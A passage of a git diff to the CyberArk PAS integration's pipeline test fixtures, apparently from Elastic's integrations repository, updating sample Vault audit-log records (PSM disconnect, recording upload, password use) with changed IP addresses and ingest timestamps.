Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:00:21\",\"IsoTimestamp\":\"2021-03-15T15:00:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813849500Z", + "original": "\u003c5\u003e1 2021-03-15T15:00:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:00:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:00:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:00:21\",\"IsoTimestamp\":\"2021-03-15T15:00:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json index 7f3955607f7..a67cff14a59 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json @@ -65,7 +65,7 @@ "event": { "severity": 2, "action": "psm upload recording", - "ingested": "2021-06-09T10:24:32.315195700Z", + "ingested": "2021-12-09T13:36:52.241443500Z", "original": "\u003c5\u003e1 2021-03-25T09:20:56Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 05:20:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T09:20:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e304\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Upload Recording\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_COMP01\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Upload Recording\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\a4636750-50a2-492e-984c-e08743d8a883.SSH.txt\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eDstHost=rhel7.cybr.com;LogonAccount=logon;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:46;SessionID=a4636750-50a2-492e-984c-e08743d8a883;SrcHost=127.0.0.1;User=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Upload Recording\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 05:20:56\",\"IsoTimestamp\":\"2021-03-25T09:20:56Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"304\",\"Desc\":\"PSM Upload Recording\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_COMP01\",\"Action\":\"PSM Upload Recording\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"Root\\\\a4636750-50a2-492e-984c-e08743d8a883.SSH.txt\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"DstHost=rhel7.cybr.com;LogonAccount=logon;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:46;SessionID=a4636750-50a2-492e-984c-e08743d8a883;SrcHost=127.0.0.1;User=root;\",\"Message\":\"PSM Upload Recording\",\"GatewayStation\":\"\"}}}", "code": "304", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log index 8c77aabf909..3f7c5f3a332 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log @@ -1,11 +1,11 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 308\n Use Password\n Info\n adm2\n Use Password\n \n \n Windows\n Root\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\n 10.2.0.6\n \n \n \n (Action: Connect)\n \n Use Password\n 10.2.0.3\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"308","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"Use Password","Severity":"Info","Issuer":"adm2","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"Windows","File":"Root\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2","Station":"10.2.0.6","Location":"","Category":"","RequestId":"","Reason":"(Action: Connect)","ExtraDetails":"","Message":"Use Password","GatewayStation":"10.2.0.3","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WIN-SERVER-LOCAL"},{"Name":"UserName","Value":"Administrator2"},{"Name":"Address","Value":"dbserver.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"LogonDomain","Value":"DBServer"},{"Name":"SequenceID","Value":"1"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"success"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"LastSuccessReconciliation","Value":"1604944215"},{"Name":"Customer","Value":"EvilCorp"}]}}}} -<5>1 2021-03-11T17:38:12Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:12\n 2021-03-11T17:38:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n fun and profit\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:12","IsoTimestamp":"2021-03-11T17:38:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:46:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:49\n 2021-03-11T17:46:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n FOR FUN.\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:49","IsoTimestamp":"2021-03-11T17:46:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"FOR FUN.","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:48:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:27\n 2021-03-11T17:48:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n For fun and profit\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:27","IsoTimestamp":"2021-03-11T17:48:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"For fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:54:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:49\n 2021-03-11T17:54:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n Because I say so\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:49","IsoTimestamp":"2021-03-11T17:54:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"Because I say so","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:56:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:30\n 2021-03-11T17:56:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n for fun\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:30","IsoTimestamp":"2021-03-11T17:56:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"for fun","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T20:23:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:17\n 2021-03-11T20:23:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n testing\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:17","IsoTimestamp":"2021-03-11T20:23:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"testing","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:31:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:54\n 2021-03-15T10:31:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:54","IsoTimestamp":"2021-03-15T10:31:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:26\n 2021-03-15T14:08:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:26","IsoTimestamp":"2021-03-15T14:08:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-16T10:04:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:49\n 2021-03-16T10:04:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:49","IsoTimestamp":"2021-03-16T10:04:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-11T17:38:12Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:12\n 2021-03-11T17:38:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n fun and profit\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:12","IsoTimestamp":"2021-03-11T17:38:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use 